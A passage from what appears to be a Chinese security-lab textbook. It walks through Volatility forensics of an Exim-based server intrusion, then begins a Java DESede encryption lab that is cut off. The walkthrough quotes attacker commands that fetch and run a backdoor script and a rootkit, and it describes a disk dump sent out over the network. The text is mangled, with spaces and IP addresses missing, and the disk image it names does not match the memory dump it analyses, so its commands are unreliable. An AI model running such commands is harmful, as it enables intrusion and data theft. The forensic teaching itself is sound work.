4.4【實(shí)訓(xùn)16】volatility取證 一、實(shí)訓(xùn)目的1.能利用volatility進(jìn)行簡單取證；2.了解volatility取證分析的一般過程；3.能使用volatility調(diào)查案件、搜索和查找證據(jù)、生成報(bào)告。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】 linux操作系統(tǒng)，volatility工具【案例背景】有一起黑客入侵案件，對(duì)涉案嫌疑人計(jì)算機(jī)的整個(gè)硬盤進(jìn)行了鏡像，鏡像文件名為ImageFilePC.E01，其MD5值為F8F80C8E757800CEB6D94ADC7BAE84FD。要求通過volatility的實(shí)訓(xùn)操作，能進(jìn)行簡單取證，并熟悉使用volatility調(diào)查案件時(shí)如何創(chuàng)建案例、如何搜索和查找證據(jù)、如何生成報(bào)告，熟悉其主要功能和使用方法。linux操作系統(tǒng)，提供的鏡像文件一份(ImageFilePC.E01)【實(shí)訓(xùn)步驟】步驟1：分析鏡像文件（1）先掛載鏡像mount-oloopvictoria-v8.sda1.img/mnt將鏡像掛載到/mnt。然后切換到/mnt目錄，可以看到相應(yīng)的系統(tǒng)文件。（2）在var/log目錄下，可以獲取相應(yīng)的linux版本信息。注意：dmesg用來顯示開機(jī)信息，kernel會(huì)將開機(jī)信息存儲(chǔ)在ringbuffer中。若是開機(jī)時(shí)來不及查看信息，可利用dmesg來查看。開機(jī)信息亦保存在/var/log目錄中，名稱為dmesg的文件里。步驟2：獲取相應(yīng)profile方法1：創(chuàng)建自己的profile。Volatility自帶一些windows系統(tǒng)的profile，Linux系統(tǒng)的Profile需要自己制作。制作的方法如下：將module.dwarf和system.map打包成一個(gè)zip文件，接著將zip文件移動(dòng)到volatility/plugins/overlays/linux/中。Linux的Profile文件是一個(gè)zip的壓縮包。方法2：利用搜索引擎或者已公開的profile。將公開的項(xiàng)目放入對(duì)應(yīng)的位置volatility/plugins/overlays/linux中?？梢酝ㄟ^pythonvol.py--info來查看，確認(rèn)是否加載profile。步驟3：開始分析文件命令：pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱-h查看linux鏡像的命令，以及相應(yīng)功能介紹。命令：pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱linux_psaux查看進(jìn)程。命令：pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱linux_netstat查看各種網(wǎng)絡(luò)相關(guān)信息，如網(wǎng)絡(luò)連接、路由表、接口狀態(tài)等。命令：pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱linux_bash查看bash的歷史記錄。其中有如下一條記錄，顯示通過scp命令復(fù)制了exim4目錄下的所有文件。scpweng@:/home/weng/temporary/Exim/*另外在/mnt/var/log/Exim目錄下的log中看到，wget/c.pl-O/tmp/c.plwget/rk.tar-O/tmp/rk.tar;sleep1000兩條命令，似乎從下載了東西。攻擊者已經(jīng)下載了兩個(gè)文件c.pl和rk.tar，都在/tmp中。c.pl的簡單分析表明，它是一個(gè)perl腳本，用于創(chuàng)建一個(gè)c程序，該程序編譯給支持SUID的可執(zhí)行文件，打開一個(gè)后門并向攻擊者發(fā)送信息。c.pl被下載，并且編譯的SUID在端口5555中打開了一個(gè)到的連接，如下所示：wget/c.pl-O/tmp/c.pl;perl/tmp/c.pl5555同時(shí)，還看到了攻擊者一個(gè)奇怪的操作。攻擊者將/dev/sda1整個(gè)dump下來，并通過8888端口發(fā)送了出去。Eximreject日志顯示IP01作為要發(fā)送郵件的主機(jī)：，和H=()[01]H=(0)[01]H=()[01]pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱linux_netstat發(fā)現(xiàn)有兩個(gè)已經(jīng)關(guān)閉的連接，如下所示。TCP02:2501:37202CLOSEsh/2065TCP02:2501:37202CLOSEsh/2065這基本也顯示了，01也是一個(gè)攻擊IP。之后通過上面的信息，知道攻擊者是通過Exim成功攻擊了這臺(tái)服務(wù)器。通過搜索exim相關(guān)的漏洞我們基本可以確定攻擊是CVE-2010-4344。我們知道攻擊者成功攻擊了此臺(tái)服務(wù)器，但是從cat/mnt/var/log/auth.log|grepFailed中看到，攻擊者一直嘗試以Ulysses的賬戶名登錄，卻沒登錄成功。攻擊者可能只是一個(gè)腳本小子，利用已有的cve公布了的exp進(jìn)入到了系統(tǒng)并沒有成功登錄賬戶其次通過分析，可以知道攻擊的發(fā)起以及結(jié)束并且了解到攻擊者簡單嘗試了登錄賬戶幾十次后就放棄了?！就卣谷蝿?wù)】任務(wù)1：查找名稱為“code”的文件，查看其內(nèi)容并計(jì)算Hash值。任務(wù)2：查找創(chuàng)建時(shí)間為2019年1月12日的jpg圖片，其內(nèi)容顯示與手機(jī)有關(guān)。請(qǐng)搜索并計(jì)算相應(yīng)的校驗(yàn)值?！緦?shí)訓(xùn)拓展】1.如何使用volatility查找不同編碼代碼？2.如何將volatility發(fā)現(xiàn)的被刪除文件導(dǎo)出并進(jìn)行備份？3.怎樣保障volatility取證和分析過程中證據(jù)的可靠性？

專題5數(shù)據(jù)加密技術(shù)5.1【實(shí)驗(yàn)17】對(duì)稱密碼算法的實(shí)現(xiàn)一、實(shí)訓(xùn)目的1.掌握運(yùn)用java平臺(tái)實(shí)現(xiàn)對(duì)稱加密的相關(guān)的類和使用方法。2.了解對(duì)稱加密體制的基本原理；3.了解加密體制中密鑰的隨機(jī)生成的實(shí)現(xiàn)方法和重要性；4.了解DESEDE算法，并運(yùn)行此算法實(shí)現(xiàn)對(duì)字符串的加解密。二、實(shí)訓(xùn)任務(wù) 對(duì)稱加密算法是應(yīng)用較早的加密算法，技術(shù)成熟。在對(duì)稱加密算法中，數(shù)據(jù)發(fā)信方將明文（原始數(shù)據(jù)）和加密密鑰一起經(jīng)過特殊加密算法處理后，使其變成復(fù)雜的加密密文發(fā)送出去。收信方收到密文后，若想解讀原文，則需要使用加密用過的密鑰及相同算法的逆算法對(duì)密文進(jìn)行解密，才能使其恢復(fù)成可讀明文。在對(duì)稱加密算法中，使用的密鑰只有一個(gè)，發(fā)收信雙方都使用這個(gè)密鑰對(duì)數(shù)據(jù)進(jìn)行加密和解密，這就要求解密方事先必須知道加密密鑰。對(duì)稱加密程序?qū)?chuàng)建一個(gè)DESEDE密鑰，用它來加密一個(gè)字符串，然后對(duì)加密的字符串進(jìn)行解密，最后把密方文和明文一起顯示在屏幕上。由于每次執(zhí)行時(shí)所采用的密鑰是不同的，每一次運(yùn)行所產(chǎn)生的密鑰都不一樣?！舅惴▽?shí)現(xiàn)】SimpleExample.javaimportjava.security.*;importjavax.crypto.*;/**SimpleExample.java*ThisclasscreatesaTri